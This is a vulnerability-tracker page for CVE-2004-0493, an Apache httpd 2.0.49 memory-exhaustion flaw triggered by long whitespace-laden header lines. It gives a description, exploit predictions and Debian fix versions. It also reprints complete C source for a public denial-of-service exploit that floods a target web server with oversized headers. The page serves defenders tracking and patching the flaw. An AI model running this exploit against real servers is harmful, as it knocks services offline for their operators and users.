CVE-2004-0493

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-360 dos multiple verified

bkbll · 2004-07-22

Apache - Arbitrary Long HTTP Headers (Denial of Service)

Source code queued for fetch — refresh in a moment.

EDB-371 dos linux verified c · 1 KB

anonymous · 2004-08-02

Apache - Arbitrary Long HTTP Headers Denial of Service

c exploit Source: Exploit-DB

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>

#define A 0x41
#define PORT 80

struct sockaddr_in hrm;

int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
int i,x;
char buf[300],a1[8132],a2[50],host[100],content[100];
char *ip=argv[1],*new=malloc(sizeof(int));
sprintf(new,"\r\n");
memset(a1,'\0',8132);
memset(host,'\0',100);
memset(content,'\0',100);
a1[0] = ' ';
for(i=1;i<8132;i++)
a1[i] = A;
if(argc<2)
{
printf("%s: IP\n",argv[0]);
exit(0);
}
x = conn(ip);
printf("[x] Connected to: %s.\n",inet_ntoa(hrm.sin_addr));
sprintf(host,"Host: %s\r\n",argv[1]);
sprintf(content,"Content-Length: 50\r\n");
sprintf(buf,"GET / HTTP/1.0\r\n");
write(x,buf,strlen(buf));
printf("[x] Sending buffer...");
for(i=0;i<2000;i++)
{
write(x,a1,strlen(a1));
write(x,new,strlen(new));
}
memset(buf,'\0',300);
strcpy(buf,host);
strcat(buf,content);
for(i=0;i<50;i++)
a2[i] = A;
strcat(buf,a2);
strcat(buf,"\r\n\r\n");
write(x,buf,strlen(buf));
printf("done!\n");
close(x);

}

// milw0rm.com [2004-08-02]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.0.50-1`
sid	Fixed	`2.0.50-1`
forky	Fixed	`2.0.50-1`
bullseye	Fixed	`2.0.50-1`
bookworm	Fixed	`2.0.50-1`

References

https://security-tracker.debian.org/tracker/CVE-2004-0493

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.